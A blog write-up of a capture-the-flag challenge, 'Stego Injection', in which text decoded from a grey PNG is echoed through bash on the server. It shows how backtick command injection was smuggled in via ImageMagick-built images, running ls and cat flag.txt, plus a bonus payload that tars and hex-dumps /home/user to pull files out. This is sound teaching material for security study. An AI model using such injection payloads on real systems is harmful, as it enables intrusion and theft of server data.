Reverse engineering, Windows internals, x86 magic, low level programming, and everything else I feel like writing about.

CrySyS SecChallenge 2020: Stego Injection

Hi there!

I’m working on a steganography toolkit for some foreign investors. It’s going to be hosted on their servers which contain some very sensitive data so the security of the toolkit is kind of important… The toolkit will be able to create a grey png image from the text you type in and then you can upload it and the server will echo back the decoded text. Sadly I only had time to implement the decoding part and to create a test image but they really want to try it out in two weeks. I’m a bit afraid that they find something and then I won’t get the second part of my payment :( Could you please look around and tell me if everything’s okay?

Categories

Steganography

Files

Solution

Contracy to the category, this isn’t steganography, seraching the image for hints is wasted work. The encoding of the text in the image is just straight the characters as colors, this can be easily seen by eye. The trick here was that the result is literally echo‘d, via bash. Therefore simply adding commands inside backticks will be ran.

I just wrote `ls` into a text file, then converted it into a PNG via ImageMagick:

magick convert -size 4x1 -depth 8 gray:cmd.txt cmd.png

And sent it to the server, which promptly replied:

bin boot dev Dockerfile etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv start.sh sys tmp usr var

Next I ran the payload cat flag.txt:

cd20{REDACTED}

Bonus

Use this payload to download the server envirnoment:

sh -c "tar -zcvf - /home/user | od -A n -t x1"

This will provide us the whole user folder as a .tar.gz dumped out as hex. You can find this in the Files section.